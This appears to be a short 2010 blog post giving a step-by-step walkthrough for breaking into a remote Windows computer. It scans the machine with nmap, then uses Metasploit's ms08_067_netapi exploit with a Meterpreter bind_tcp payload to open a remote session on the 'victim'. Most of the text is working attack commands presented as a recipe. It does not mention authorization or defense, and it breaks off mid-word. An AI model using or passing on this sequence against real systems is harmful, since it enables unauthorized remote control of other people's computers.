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Showing posts from April, 2010

hack the target system

Main Part: - We download nmap ( so that we can scan the remote pc. - On the terminal we write: nmap -sS -O - If you see that ports 139 TCP and 445 TCP are open then everything is exactly as we want it to be. - Now we download Metasploit ( and we open it via the Terminal. - Now that Metasploit is running we start the attack. - We write at the terminal “show exploits” and we get a list of the avaliable exploits. - We choose the exploit “ms08_067_netapi” by writing “use windows/smb/ms08_067_netapi” - Now we set RHOST to our victims ip: “set RHOST ” - And RPORT to 445: “set RPORT 445″ - Now we write “set SMBPIPE SRVSVC” and hit ENTER and then “set TARGET 0″ and hit ENTER again. - OK! Let’s set the Payload: “set PAYLOAD windows/meterpreter/bind_tcp” - IT’S TIME TO HACK THE COMPUTER!!!! Write “exploit” and hit ENTER. - If everything is ok you should see the following message: “[*] Meterpeter session 1 opened ( -> - Meterpet...